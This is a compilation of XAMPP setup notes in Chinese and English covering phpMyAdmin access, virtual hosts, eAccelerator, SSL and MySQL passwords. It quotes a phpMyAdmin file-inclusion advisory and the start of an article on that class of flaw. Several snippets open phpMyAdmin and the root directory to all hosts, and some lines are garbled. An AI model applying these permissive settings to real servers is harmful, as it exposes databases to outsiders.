xampp docs
xampp download
http://nchc.dl.sourceforge.net/project/xampp/XAMPP%20Linux/1.8.1/xampp-linux-1.8.1.tar.gz
http://downloads.sourceforge.net/project/xampp/XAMPP%20Linux/5.6.3/xampp-linux-x64-5.6.3-0-installer.run
xampp security
xampp 中phpmyadmin 安全配置
http://blog.csdn.net/nailwl/article/details/7342778
phpmyadmin 遇到Access forbidden的处理方法
http://blog.csdn.net/xshalk/article/details/8537551
本地环境 Ubuntu 下安装XAMPP,phpmyadmin无法正常访问解决办法
http://www.douban.com/note/233575808/
Ubuntu: 截止本文发布时,ubuntu的最新版本为12.04.本文所讲述故障也是发生于此版本环境下
XAMPP: xampp-linux-1.8.0.tar.gz
安装过程不细说,直接介绍安装完毕后访问 http://localhost/phpmyadmin/ 时出现如下提示:
Access forbidden!
New XAMPP security concept:
Access to the requested directory is only available from the local network.
This setting can be configured in the file “httpd-xampp.conf”.
解决办法:
进入命令行模式,先将账户切换至root
$ sudo -s
vi打开需要编辑的httpd-xampp.conf文件
# vi /opt/lampp/etc/extra/httpd-xampp.conf
(vi如何操作,请查阅相关内容)
找到这段代码:
# since XAMPP 1.4.3
<Directory “/opt/lampp/phpmyadmin”>
AllowOverride AuthConfig Limit
Order allow,deny
Allow from all
</Directory>
为其增加一行Require all granted,最后如下所示:
# since XAMPP 1.4.3
<Directory “/opt/lampp/phpmyadmin”>
AllowOverride AuthConfig Limit
Order allow,deny
Allow from all
Require all granted
</Directory>
保存并退出。重启XAMPP 。
操作完毕。
原文链接: http://aiwei.us/5325.html
XAMPP开机 自动 启动
5.设置随系统自动启动,系统重启XAMPP是不会自动启动的,需要设置
ln -s /opt/lampp/lampp /etc/rc.d/rc3.d/S99lampp
ln -s /opt/lampp/lampp /etc/rc.d/rc4.d/S99lampp
ln -s /opt/lampp/lampp /etc/rc.d/rc5.d/S99lampp
XAMPP 中配置多个网站 / Apache 多 站点 配置
怎么在Apache环境下建立N个站点的配置方法
http://www.woplus.com/phptech/apache-website-peizhi/
假设你的主机IP是:127.0.0.1你的主机上有三个域名:
www.a.com 网页文件放在E:\web\www\1
www.b.com 网页文件放在E:\web\www\2
www.c.com 网页文件放在E:\web\www\3
在apache的httpd.conf中加入
#设置不同的域名到不同的目录
NameVirtualHost 127.0.0.1
<VirtualHost 127.0.0.1>
DocumentRoot “E:\web\www\a”
ServerName www.a.com
</VirtualHost>
<VirtualHost 127.0.0.1>
DocumentRoot “E:\web\www\b”
ServerName www.b.com
</VirtualHost>
<VirtualHost 127.0.0.1>
DocumentRoot “E:\web\www\c”
ServerName www.c.com
</VirtualHost>
配置好后重启Apache,OK了!
XAMPP中配置多个网站
XAMPP Security Phpmyadmin 文件包含漏洞
PHP文件包含漏洞原理分析和利用方法
http://www.dedecms.com/knowledge/program/php/2009/0929/48.html
http://www.phpmyadmin.net/home_page/security/PMASA-2011-11.php
Apache2安装后出现403 Forbidden 的原因 / apache index list allow / apache 列表展示所有文件
http://www.toplee.com/blog/93.html
修改1
<Directory />
Options FollowSymLinks
AllowOverride None
#XAMPP
#Order deny,allow
#Deny from all
# tangxje add
Order allow,deny
Allow from all
</Directory>
修改2
## <Directory "/opt/lampp/htdocs">
<Directory "/b2clog">
修改3
## DocumentRoot "/opt/lampp/htdocs"
DocumentRoot "/b2clog"
[root@lindows lampp]# ./lampp security
XAMPP: Quick security check...
XAMPP: Your XAMPP pages are NOT secured by a password.
XAMPP: Do you want to set a password? [yes] yes
XAMPP: Password:
XAMPP: Password (again):
XAMPP: Password protection active. Please use 'lampp' as user name!
XAMPP: MySQL is accessable via network.
XAMPP: Normaly that's not recommended. Do you want me to turn it off? [yes] yes
XAMPP: Turned off.
XAMPP: MySQL has to run before I can check the security.
XAMPP: MySQL has to run before I can check the security.
XAMPP: The FTP password is still set to 'lampp'.
XAMPP: Do you want to change the password? [yes] yes
XAMPP: Password:
XAMPP: Password (again):
XAMPP: ProFTPD isn't running...
XAMPP: Done.
[root@lindows lampp]# ./lampp restart
Stopping XAMPP for Linux 1.6.7...
XAMPP: XAMPP-Apache is not running.
XAMPP: XAMPP-MySQL is not running.
XAMPP: XAMPP-ProFTPD is not running.
XAMPP stopped.
Starting XAMPP for Linux 1.6.7...
XAMPP: Starting Apache with SSL (and PHP5)...
XAMPP: Error 1! Couldn't start Apache!
XAMPP: Starting diagnose...
XAMPP: Your /etc/hosts is not okay. I will fix it.
XAMPP: See also http://www.apachefriends.org/faq-lampp-en.html#failed
XAMPP: Next try...
XAMPP: Starting Apache with SSL (and PHP5)...
XAMPP: Starting MySQL...
XAMPP: Starting ProFTPD...
XAMPP for Linux started.
http://localhost
id:lampp passsword:********
Install XAMPP for easy, integrated development
http://www.ibm.com/developerworks/linux/library/l-xampp/
XAMPP download
http://www.apachefriends.org/en/xampp.html
http://sourceforge.net/projects/xampp/files/XAMPP%20Linux/
http://ncu.dl.sourceforge.net/project/xampp/XAMPP%20Windows/1.7.3/xampp-win32-1.7.3.zip
http://sourceforge.net/projects/xampp/files/XAMPP%20Windows/xampp-win32-1.7.3.zip/download
XAMPP windows
http://luoke920.iteye.com/blog/719873
在windows下安装eAccelerator
http://hi.baidu.com/btjxzzy/blog/item/f09f4cd9e9c1ba2e11df9b00.html
XAMPP for Windows 简易教程
http://www.iteye.com/topic/569983
xampp + eclipse 环境下如何调试PHP
XAMPP svn plugin
apache svn,httpd.conf 需要添加如下:
#added by ggsonic
LoadModule dav_svn_module modules/mod_dav_svn.so
LoadModule authz_svn_module modules/mod_authz_svn.so
#added by ggsonic for svn url
<Location /svn/project1>
DAV svn
SVNPath D:/develop/repo/svn/project1
</Location>
在D:/develop/repo/svn/project1文件夹处点右键 创建代码库。
Php.ini 需要使能extension=php_curl.dll
XAMPP eAccelertor enable
http://leeyin.iteye.com/blog/436259
PHP缓存加速器:eAccelerator
http://www.linuxsir.org/main/node/257
PHP加速器 eaccelerator 介绍
http://www.toplee.com/blog/100.html
给PHP加速,eAccelerator配置和使用指南
http://www.chedong.com/blog/archives/001154.html
[EAC] PHP 预编译加速: eAccelerator的安装和性能比较
http://lin71896532.blog.35.cn/2008/08/21/xampp%E4%B8%AD%E6%BF%80%E6%B3%95eaccelerator/
先要看一份XAMPP预安装的php相关的扩展清单
Apache 2.2.9,
MySQL 5.0.51b,
PHP 5.2.6 & 4.4.8 & PEAR + SQLite 2.8.17/3.3.17 + multibyte (mbstring) support,
Perl 5.10.0,
ProFTPD 1.3.1,
phpMyAdmin 2.11.7,
OpenSSL 0.9.8h,
GD 2.0.1,
Freetype2 2.1.7,
libjpeg 6b,
libpng 1.2.12,
gdbm 1.8.0,
zlib 1.2.3,
expat 1.2,
Sablotron 1.0,
libxml 2.6.31,
Ming 0.3,
Webalizer 2.01,
pdf class 009e,
ncurses 5.8,
mod_perl 2.0.4,
FreeTDS 0.63,
gettext 0.11.5,
IMAP C-Client 2004e,
OpenLDAP (client) 2.3.11,
mcrypt 2.5.7,
mhash 0.8.18,
eAccelerator 0.9.5.3 ,
cURL 7.18.2,
libxslt 1.1.8,
phpSQLiteAdmin 0.2,
libapreq 2.08,
FPDF 1.53,
XAMPP Control Panel 0.6
所以在我们只需要去重新配置下php.ini中的选项
\\\\ 略 、、、
删除分号的每一行开头并重新启动xampp 。 eaccelerator就激活了。
详细请参考:
http://www.apachefriends.org/en/xampp.html
另附加php相关优化扩展在xampp下的安装教程(IBM)
为 PHP 应用提速、提速、再提速!
用 Memcache 守护程序把数据缓存到内存中
XAMPP_百度百科
http://baike.baidu.com/view/864591.htm
百科名片
<script type="text/javascript">/*<![CDATA[*/(function(){var $=baidu.G("cardSummary");if($){var _=$.getElementsByTagName("a");for(var B=0,A=_.length;B<A;B++){baidu.on(_[B],"click",function(){nslog(this.href,72);});}}})();/*]]>*/</script>
<script type="text/javascript">lemma.catalog.start();</script>
软件信息
许多人通过他们自己的经验认识到安装 Apache 服务器是件不容易的事儿。如果您想添加 MySQL、PHP 和 Perl,那就更难了。XAMPP 是一个易于安装且包含 MySQL、PHP 和 Perl 的 Apache 发行版。XAMPP 的确非常容易安装和使用:只需下载,解压缩,启动即可。
软件版本
到目前为止,XAMPP 共有以下四种版本: 适用于 Linux 的版本(已在 Ubuntu、SuSE、RedHat、Mandrake 和 Debian 下通过测试), 适用于 Windows 98、NT、2000、2003、XP 和 Vista 的版本, 适用于 Solaris SPARC 的测试版(在 Solaris 8 环境下开发并测试), 适用于 Mac OS X 的测试版。 适用于 Mac OS X 和 Solaris 的 XAMPP 版本尚处于开发的第一阶段。使用时风险自担! XAMPP 1.7.2 已发布! 更新: Apache 2.2.6 + OpenSSL 0.9.8g MySQL 5.0.51 PHP 5.2.5 & PHP 4.4.6 phpMyAdmin 2.11.3 FileZilla FTP Server 0.9.24 Mercury Mail Transport System v4.52
注意信息
MOD_PERL 警告:新发布的 Apache 2.2.6 不支持 mod_perl(win32)。看起来 Apache httpd 小组已经知道了这个问题,并在下次发布 Apache 时会修正该问题。顺便说一句:Mod_JK(Tomcat 6.0.13 插件)用起来没有问题。 Vista 用户请注意:由于对 Vista 默认安装的 c:\program files 文件夹没有足够的写权限,我们推荐您为 XAMPP 安装创建新的路径,如 c:\xampp 或 c:\myfolder\xampp。
安装运行
安装与启动
以系统管理员用户登录,将下载的包在服务器上解压到任意目录(不能放在中文名目录内)、比如放到c盘根目录, 双击运行目录内的setup_xampp.bat初始化xampp。然后运行 xampp-control.exe 可以启动或停止apache、mysql等各个模块并可将其注册为服务。 PHP 5与PHP 4的切换 XAMPP从 1.4.7版开始支持PHP 5与PHP 4可选启动,便于用户根据PHP程序的需要做出选择。 运行根目录下的php-switch.bat即可进入php切换的命令窗口 切换到php4: 在命令窗口输入4 切换到php5: 在命令窗口输入5 移动整体环境到其它地方(移动到其它目录或服务器) 只运行根目录下的setup_xampp.bat即可进入命令窗口,选择“1"对环境重新进行初始化即可。 注意:如果您启用了虚拟主机,这时需要重新检查虚拟主机配置文件中的相对路径是否正确(如果设置的是绝对路径则不必检查)
提高系统安全
XAMPP默认安装之后是很不安全的,普通用户不用任何密码就可以访问其Web管理页面,修改数据库。我们只需要点击左方菜单的 "安全"选项,按照向导操作即可完成安全设置。 在默认状态下,phpmyadmin有两个用户名,分别是pma和root。其中,root是管理员身份,而pma则是普通用户身份,但二者在缺省状态下均无密码。 这里的两个默认用户的密码务必要设置,设置方法: (1)先在“安全”这里设置好root账户的密码 (2)通过默认主页左侧的phpmyadmin导航栏进入phpmyadmin界面,输入用户名root后直接点击登陆即可。 (3)更改pma帐号密码:登录后,点击首页的“权限”菜单,点击出现的“用户一览”页面的用 户名“pma”后面的图标进入权限设置页面,在“编辑权限”这个页面的“更改密码”这里设置密码。更改后用写字板或记事本等文本编辑器 xampp\phpMyAdmin\config.inc.php的第63行的pma密码更改为刚才设置的密码,否则,登陆会出错。 注:只有pma不设置密码时,XAMPP的web主界面的MySQL database的状态才会显示为ACTIVATED状态!
目录说明:
Web程序(PHP、Html)都放到 xampp\htdocs\ perl文件目录 xampp\cgi-bin\; apache基础配置:xampp\apache\conf\extra\httpd.conf apache更多配置(如虚拟主机等)文件:xampp\apache\conf\extra\ php配置文件:xampp\apache\bin\php.ini
配置虚拟主机:
只需要修改虚拟主机配置文件:xampp\apache\conf\extra\httpd-vhosts.conf。 这里只说明基于域名(服务器只有单ip)的虚拟主机配置方法,基于ip(服务器多ip,可以每个虚拟主机一个ip)等的配置方法请参考apache官方手册。 (1)请将“#NameVirtualHost *:80”这里的“#”去掉,即改为“NameVirtualHost *:80”,如果使用的非80端口,将这里和下面虚拟主机配置文件中的“80"改为实际端口即可。 (2)我们看看这个配置文件下面的“VirtualHost example:”这部分,为了便于本机操作,我们先建立起“localhost”这个虚拟主机,否则一旦启用虚拟主机会导致本地的xampp无法进入web管理界面。 配置文件自带了两个配置好但没启用的例子,我们建好的“localhost”的虚拟主机应该是这样的: <VirtualHost *:80> ## ServerAdmin DocumentRoot /xampp/htdocs ServerName localhost ## ErrorLog @rel_logfiledir@/dummy-host2.error_log ## CustomLog @rel_logfiledir@/dummy-host2.access_log common </VirtualHost> 其中,没有注释符的几项是必需的,有注释符的项目是可选的,当然,您也可以根据apache官方文档设定更多的项目。 “DocumentRoot”: 必需。这个是虚拟主机站点的根目录,可以是相对路径或绝对路径、路径不能包含空格等特殊字符。 使用相对路径时路径是相对环境所在的分区,我的环境放在d盘的根目录,所以示例中写作“/xampp/htdocs”、也可以写作“D:/xampp /htdocs”(后面不加"/"),如果环境放在d盘的www目录,那么这里的路径就要写作“/www/xampp/htdocs”、也可以写作“D: /www/xampp/htdocs”(后面不加"/")。 配置虚拟主机失败多数都是路径设置的不对。 “ServerName”: 必需。这个是配置虚拟主机的域名。可以是“localhost”、“cmsware”、等。 虚拟主机配置常见问题: 如果配置后apache通过管理面板启动不了,请直接运行环境根目录下的apache_start.bat、apache_stop.bat启动或关闭apache,这时能看到具体的报错信息。 如果虚拟主机配置后没生效,看看apache报错日志(xampp\apache\logs\error.log)一般就能知道原因所在。
提醒:
1,Skype与XAMPP的Apache有冲突,因为 Skype 缺省情况下把80端口和443端口作为接入设备的备用端口,也就是所谓的防火墙穿透了。 解决方法:重新设置 Skype 菜单 "工具"->"选项"->"连接" 项,去掉 “把80端口和443端口作为接入设备的备用端口” 前面的复选框。副作用:如果你的 Skype 处于防火墙/代理之下,将没法正常使用 Skype ,只有正确设置了防火墙/代理的端口重定向才行。 2,正在使用迅雷时也会导致xampp套件中的apache无法启动,可以先停掉迅雷。启动后再使用迅雷没问题。 3,如果通过管理面板启动或关闭apache、mysql,请直接运行环境根目录下的 apache_start.bat、apache_stop.bat或mysql_start.bat、mysql_stop.bat启动或关闭 apache、mysql,这时能看到具体的报错信息 4,如果您启用了组件中的ftp但远程连接时却根本连不上也没任何报错,这时请检查一下您服务器上是否设置了防火墙
XAMPP 的 Windows 版 FAQ
XAMPP 的 Windows 版 FAQ
作者:Kay Vogelgesang,
版本:2005 年 10 月 31 日
简体中文版的 FAQ 有待翻译 :)
1. General Questions
XAMPP does not work under Windows XP SP2!
Sure! But here, Microsoft delivered a new firewall. This firewall blocks the important ports 80 (http) and 443 (https) and the server does not want to start (anymore). The fast solution: Deactivate the Microsoft firewall with the toolbar and try to start XAMPP once more.
Of course everybody also can define the own firwall exceptions in the security center. The following ports are needed for a basic functionality:
http 80 (HTTP)
https 443 (SSL)
mysql 3306
And for all other servers in XAMPP:
ftp 21
smtp 25
pop3 110
imap 143
AJP/1.3 8009
http-alt 8080 (Tomcat Default Port)
Where I change the start page?
Document is called a folder the $path-to-xampp\xampp\htdocs. There is the index site (index.html) the real start page which is initialized after executing of http://localhost. Alternatively, this page can also be deleted and replaced by "index.php" or "index.cgi" (etc.). The hierarchy of all index pages in the XAMPP be called:
DirectoryIndex index.php index.php4 index.php3 index.cgi index.html index.htm index.html.var index.phtml
Note: After changing that, you will find the XAMPP examples with the URL http://localhost/xampp.
However, I need mod_perl, the Tomcat or Python!
The tools for this exist with the XAMPP AddOns. Note: These additional packages work only the XAMPP main package not with the “xampplite”. At the moment there are the following AddOns:
Perl with mod_perl and many DBI drivers for the respective version of XAMPP (Apache)
Tomcat with mod_jk 2 but without Java JSDK. The required JSDK for that Addon was published in the download page or in the Readme. You should be installed Java JSDK before installing this AddOn!
Python with mod_python
You find all current AddOns for win32 on the XAMPP win32 download page. Besides that there are even further AddOns for XAMPP on
http:///projects/xamppaddon.
How do I check the md5 checksum?
To check whether the package really is from developer, you need additional Programs. For example the console program md5sum.exe:
http://downloads./contrib/md5sum/Windows/md5sum.exe
So it works:
Put the XAMPP package (e.g. xampp-win32-1.4.16.exe) and MD5 file (e.g. xampp-win32-1.4.16.5) and the md5sum.exe in the same directory
Use the cmd with the following command, here:
md5sum -c xampp-win32-1.4.16.
xampp-win32-1.4.16.exe OK
Otherwise something is wrong. By the way, another GUI program is MD5summer. Please visit their homepage for more information.: http://www.
There are three "php.ini". Which is now the correct one?
The \xampp\apache\bin\php.ini is the correct one! The others in the \xampp\php directory are only for PHP in CGI/CLI mode. So configure the \xampp\apache\bin\php.ini for web changes.
Modifications in the php.ini will be saved also after the "PHP switch" (the changing of the PHP version). And note: Modifications in the php.ini and in the httpd.conf always need a Apache restart!
Help! The PV.EXE (KILL.EXE) is a Virus in the XAMPP!
No! The "pv.exe" (older the “kill.exe”) is not a Virus or a Trojan. It is a normal utility for killing processes like the kill order for Linux. We need this to stop some server like the Apache. Because the “shutdown/stop” statement do not work here without service installation. But sometimes we make a “hand start” and want to stop the Apache clean.
Problem: Some Virus scans (also like Norton) make warnings here. Because it is the name (“kill”) or perhaps some Virus/Trojan bundles contain a kill program for stopping some unwanted programs.
See also:
Microsoft C 1
Microsoft C 2
Not enough memory in the system environment
This kind of error message occurs only under home systems like Windows 95/98/ME and XP home. Problem: The worse memory administration of the Windows home systems allows not some applications like the "" to work with more memory that 160 kb. But our servers need more, however. Solution: Add the following line to c:\config.sys:
shell=c:\windows\ c:\windows /e:2048 /p
After the restart of your complete system please try XAMPP again. The memory of 2048 kb can be used now. That should be sufficient.
The apache does not start on my system!!!
This problem can be several reasons.
(1) You have started more then one HTTP Server (IIS, Sambar, ZEUS and so on). Only one Server can occupy port 80. So you must terminate one http server, before you start the Apache. Some error messages like this show the problem:
"(OS 10048)... make_sock: could not bind to adress 0.0.0.0:85
no listening sockets available, shutting down"
"(OS 10038)Socket operation on non-socket: make
_sock: for address 0.0.0.0:443, apr_socket_opt_set: (SO_KEEPALIVE)
no listening sockets available, shutting down"
(2) You have Windows 95 with an outdated winsocks or your winsocks is damage. At least the Apache needs winsocks 2. Please download the current winsocks by www.
(3) Sometimes the Winsock2 information has been corrupted by poorly written Internet programs (worms, virus). A Winsock2 Fix written by Tom Kynch can solve this problem (only 95,98,ME).
(4) It runs a firewall, which blocks the Apache port. In this case, some pictures or javascripts cannot load via http://. Sometimes, you must deinstall your firewall completly to fix this problem.
(5) You have XP professional without Service Pack 1. In this case the installation of SP1 is recommended urgently.
(6) You have a Virus Scan from McAffee. Sometimes it makes problems. Deactivate here McAffee for testing of XAMPP.
(7) You have other software, such as the Internet Telephone "SKYPE" which also blocks the port 80. (thanks Peter! ) However, one can change the SKYPE port: Actions -- > Options --> Connection. Here remove the check mark at "Port 80" for an alternate port. Restart Skype and also it should work. (thank Monty! )
Tip: The "xampp-portcheck.exe" displays the status of every essential port of XAMPP. The status "Free" is even free and that is okay.
My CPU load is with the Apache almost by 99%
Please, enable following line = > # Win32DisableAcceptEx in the /xampp/Apache/conf/httpd.conf.
In this case correct is: Win32DisableAcceptEx
The newer Apache versions have been an improved Winsock 2 support. But it does not work correctly with the Windows home versions. The statement "Win32DisableAcceptEx" in the httpd.conf deactivate this support. Sometimes, some Windows NT systems make trouble too. We do not know why.
Pictures and style Sheets are not displayed!
With some applications (phpEclipse, phpBB etc.) are problems with displaying great files rpictures. This problem can be solved in the /xampp/Apache/conf/httpd.conf these lines
# EnableSendfile offstage
# EnableMMAP offstage
Please activate these lines by removing #:
EnableSendfile offstage
EnableMMAP offstage
Apache restart.
Conversly sometimes, from
EnableSendfile offstage
EnableMMAP offstage
you should make
# EnableSendfile offstage
# EnableMMAP offstage
Try it out! Thanks for this solution to the forum and Kris!
This problem is often caused by the program "NetLimiter" for regulating bandwidth. Please see here the thread in our forum
http://www./f/viewtopic.php?t=6195&highlight=netlimiter
for more information.
I would like to install the MySQL server as a service!
I would like to install the MySQL server as a service!
Do only work under with NT, Windows 2000 and Windows XP.
(1) Service installation: Under /xampp/mysql double-click on the "mysql_installservice.bat".
(2) Service uninstallation: Under /xampp/mysql double-click on the "mysql_uninstallservice.bat". That is all!
How I can set a "root" password in MySQL? (method 1)
In the \xampp\mysql\bin directory enter into the console:
mysqladmin -u root password secret
Ok, "secret" should be your secret password. Then update the password for PHPMyAdmin. Open the "config.inc.php" in \xampp\phpmyadmin an edit following lines:
INSTEAD OF ...
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
NOW ...
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'secret';
Ads
Set a new 'root' passwort with mysqladmin
How I can set a "root" password in MySQL? (method 2 )
Well, there is still another possibility to set the root password. Start PHPMyAdmin with http://127.0.0.1/phpmyadmin, open the database "mysql" (never delete this!) and use the table "user". Create here a new user or e.g. simply change the password of "root." MySQL restart! After that, do not forget to change the password in the "xampp/phpmyadmin/config.inc.php" for PHPMyAdmin.
How I can set a "root" password in MySQL? (method 3 )
This method based on a suggestion by Ruedi from Basel. With that: Thanks and Grüssli to Switzerland!
Tip: Resetting the password can be make also with the /xampp/mysql/resetroot.bat. After that, the password is empty means "".
Step 1: Run cmd
C:\ program files \apachefriends\xampp\mysql\bin>mysqld-nt --skip-grant-tables
Step 2: Run cmd
C:\>C:\ program files\apachefriends\xampp\mysql\bin\mysqladmin -u root flush-privileges password "newpwd"
Step 3: Stopping MySQL
C:\>C:\ program files\apachefriends\xampp\mysql\bin\mysqladmin -u root -p shutdown
Enter password: ****** (newpwd)
Step 4: Edit the “config.inc.php” for the access of PHPMyAdmin
C:\ program files\apachefriends\xampp\phpmyadmin\config.inc.php
Here search for "root"
'$cfg['Servers'][$i]['password'] = 'newpwd'; // MySQL password
Step 5: MySQL restart
Can I use my own mysql server?
Why not! Simply don't start the mysql from the xampp package. So you can use your own MYSQL server. Please note! Two servers cannot be started on one same port! If you have set a password for root, please do not forget to edit the "config.inc.php" in \xampp\phpmyadmin for PHPMyAdmin.
Everyone can use PHPMyAdmin from outside!
In the basic configuration of XAMPP, PHPMyAdmin have a public access. You can close this 'gap' with the "config.inc.php". Open the configuration file of PHPMyAdmin and edit the 'auth_type' lines:
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'secret';
Now correctly ...
$cfg['Servers'][$i]['auth_type'] = 'http';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
Now, user and password are checked before PHPMyAdmin access the mysql server. Optionally you can set 'cookie' for 'http'.
PHPMyAdmin Login, here cookie based
Where is the IMAP support for PHP?
As default, the IMAP support for PHP is deactivated in XAMPP because there were some mysterious initialization errors by some home versions like Windows 98. Who work with NT systems should open the \xampp\apache\bin\php.ini to active here the php exstension by removing the beginning semicolon.
extension=php_imap.dll
Apache restart! That is the method for all not loaded PHP modules in XAMPP to loading it
I have problems with the reference of some classes in objects
Thank you Jörg to point to that problem! It seems the activation of the "Zend Optimizer" makes trouble here. Please open the \xampp\apache\bin\php.ini and deactivate all lines in the [Zend] section. After that, restart the apache.
Note: In the newer XAMPP versions, the ZEND extension is deactivate as default.
Other free opensource programs (CMS and so on) do not function!
Linux and Windows are different. So the crypt() function does not supported for windows and so on. Also the simple programming can be strange: For example the term 'var=Text;' functions in PHP for Linux. But for example for some older PHP for win32 you have to program 'var="Text";'. Or the interfaces are often too different. Or further necessary programmes are missing on other platforms. This is the reason why sometimes certain programmes do not work with XAMPP.
Can I delete the "install" directory after "installation"?
No, better not. The scripts here are still needed for all additional packages (add-ons) and upgrades of XAMPP.
Where is a the front page extension?
We do not know a free extension for the Apache under win32. But there is a "Ready-to-Run FrontPage Server Extensions for Unix": http://www./fpsupport/.
But often the developer in our forum knowing more: http://www./f/
I would like to move the XAMPP package into another directory!
Hmm ... If the "install" directory is present I would try the following: Copy the entire XAMPP package into the new directory of your choice. Then start here again the "setup_xampp.bat" for refresh all configuration files. Test everything! If all servers really still working here, it is okay! If not, then not and you should remove that copy!
How do I activate the eaccelerator?
Please open the "php.ini" in the directory \xampp\apache\bin\php.ini. Here activate the following lines by removing the semicolon in each line in the [eAccelerator] section:
extension=eaccelerator.dll
eaccelerator.shm_size = "0"
eaccelerator.cache_dir = "\xampp\tmp"
eaccelerator.enable = "1"
eaccelerator.optimizer = "1"
After that, don't forget the restart the Apache HTTPD!
I do not get any connection to my MS SQL server!
If the mssql extension was loaded in the php.ini, sometimes it comes to access problems when only TCP/IP is used. You can fix that problem with a newer "ntwdblib.dll" from Microsoft. Please replace the older file in the \xampp\apache\bin directory with your newer file from Microsoft. Apache restart. Thank you Horst for this topic note!
How do I work with the PHP mcrypt extension?
For this, we have opened a Topic in the forum with examples and also with some problem solutions: http://www.f/viewtopic.php?t=3012
Do Microsoft Activer Server Pages (ASP) work with XAMPP?
No! And Perl:ASP in the Perl Add-on is not the same! Unfortunately no free implementation for the Apache is available.
I would like to use Perl with MOD_PERL!
Therefore you need our XAMPP Perl Add-on with the big Perl Package plus Mod_perl. Please refer our Add-on download section
http://www./en/xampp-windows.html#644
and our Add-on practice section
http://www./en/xampp-windows.html#1176
for more information.
类似开发php网站环境
XAMPP功能非常强大,初学者可以同时参考PHPnow ,方便学习。
http://www.apachefriends.org/en/faq-xampp-linux.html
How do I activate eAccelerator?
(since XAMPP for Linux 1.4.12)
To activate eAccelerator simply find the following lines in your /opt/lampp/etc/php.ini :
|
Remove the semicolon at the beginning of each line and restart XAMPP. eAccelerator is now active. For more information about eAccelerator, check the eAccelerator home page: http://eaccelerator.net .
529 extension="eaccelerator.so"
530 eaccelerator.shm_size="16"
531 eaccelerator.cache_dir="/opt/lampp/tmp/eaccelerator"
532 eaccelerator.enable="1"
533 eaccelerator.optimizer="1"
534 eaccelerator.check_mtime="1"
535 eaccelerator.debug="0"
536 eaccelerator.filter=""
537 eaccelerator.shm_max="0"
538 eaccelerator.shm_ttl="0"
539 eaccelerator.shm_prune_period="0"
540 eaccelerator.shm_only="0"
541 eaccelerator.compress="1"
542 eaccelerator.compress_level="9"
RHEL 5.5_x86-64 / firefox 3.0.18 / xampp1.7.4 /
https://127.0.0.1 或者 https://localhost 来验证OpenSSL
https://127.0.0.1/xampp/splash.php
安全连接失败
127.0.0.1 使用了无效的安全证书。
该证书因为其自签名而不被信任。
该证书仅对 localhost 有效。
该证书已在 2010年09月30日 17:10 过期。
(错误码: sec_error_expired_issuer_certificate)
* 这可能是服务器配置错误,或者有人尝试模仿该服务器。
* 如果您曾经成功连接至该过服务器,该错误可能只是暂时的,您可以稍后重试。
或者,您可以添加一个例外 …
如果您使用的是一个您不完全信任的因特网连接,或者您不习惯看到此服务器的警告,您不应该添加一个例外。
https://localhost/xampp/splash.php
安全连接失败
localhost 使用了无效的安全证书。
该证书因为其自签名而不被信任。
该证书已在 2010年09月30日 17:10 过期。
(错误码: sec_error_expired_issuer_certificate)
* 这可能是服务器配置错误,或者有人尝试模仿该服务器。
* 如果您曾经成功连接至该过服务器,该错误可能只是暂时的,您可以稍后重试。
或者,您可以添加一个例外 …
如果您使用的是一个您不完全信任的因特网连接,或者您不习惯看到此服务器的警告,您不应该添加一个例外。
XAMPP WoSign SSL
首页>>技术支持 >> SSL证书安装指南
http://www.wosign.com/Support/ssl_installation.htm
[root@b2cbbs ~]# vim /opt/lampp/etc/httpd.conf
493 # Secure (SSL/TLS) connections 494 <IfModule ssl_module> 495 # XAMPP 496 <IfDefine SSL> 497 Include etc/extra/httpd-ssl.conf 498 </IfDefine> 499 </IfModule> 500 # 501 # Note: The following must must be present to support 502 # starting without SSL on platforms with no /dev/random equivalent 503 # but a statically compiled-in mod_ssl. 504 # 505 <IfModule ssl_module> 506 SSLRandomSeed startup builtin 507 SSLRandomSeed connect builtin 508 </IfModule>
[root@b2cbbs extra]# vim /opt/lampp/etc/extra/httpd-ssl.conf
104 #SSLCertificateFile /opt/lampp/etc/ssl.crt/server.crt 105 SSLCertificateFile /opt/lampp/etc/ssl.crt/tanxiujin.com_public_crt.crt 113 SSLCertificateKeyFile /opt/lampp/etc/ssl.key/tangxiujin.com_private_key.key 114 #SSLCertificateKeyFile /opt/lampp/etc/ssl.key/server.key 134 #SSLCACertificatePath /opt/lampp/etc/ssl.crt 135 SSLCACertificateFile /opt/lampp/etc/ssl.crt/WoSignSGCServer_public_crt.crt
xampp memcache
http://pecl.php.net/package/memcache
xampp phpmyadmin PHP文件包含漏洞原理分析和利用方法
http://www.phpmyadmin.net/home_page/security/PMASA-2011-11.php
PMASA-2011-11
Announcement-ID: PMASA-2011-11
Date: 2011-07-23
Summary
Local file inclusion vulnerability and code execution.
Description
In the 'relational schema' code a parameter was not sanitized before being used to concatenate a class name.
Severity
We consider this vulnerability to be critical.
Mitigation factor
An attacker must be logged in via phpMyAdmin to exploit this problem.
Affected Versions
Versions 3.4.0 to 3.4.3.1 are affected.
Solution
Upgrade to phpMyAdmin 3.4.3.2 or apply the related patch listed below.
References
This issue was found by Norman Hippert from The-Wildcat.de
Assigned CVE ids: CVE-2011-2718
Patches
Following commits have been made to fix this issue:
More information
For further information and in case of questions, please contact the phpMyAdmin team. Our website is phpmyadmin.net .
http://www.dedecms.com/knowledge/program/php/2009/0929/48.html
摘要:一、涉及到的危险函数〔include(),require()和 include_once(),require_once()〕 include()&&require()语句:包括并运行指定文件。这两种结构除了在如何处理失败之外完全一样。include()产 生一个警告而require()则导致一个致命错误。换句话说,如果你想在遇到丢失文件时停止处理页面就用require()。include()就不是 这样。
本文章简单摘要:一、涉及到的危险函数〔include(),require()和include_once(),require_once()〕 include()&&require()语句:包括并运行指定文件。这两种结构除了在如何处理失败之外完全一样。include()产 生一个警告而require()则导致一个致命错误。换句话说,如果你想在遇到丢失文件时停止处理页面就用require()。include()就不是 这样。
一、涉及到的危险函数〔include(),require()和include_once(),require_once()〕
include() && require()语句:包括并运行指定文件。
这两种结构除了在如何处理失败之外完全一样。include() 产生一个警告而 require() 则导致一个致命错误。换句话说,如果你想在遇到丢失文件时停止处理页面就用 require()。include() 就不是这样,脚本会继续运行。
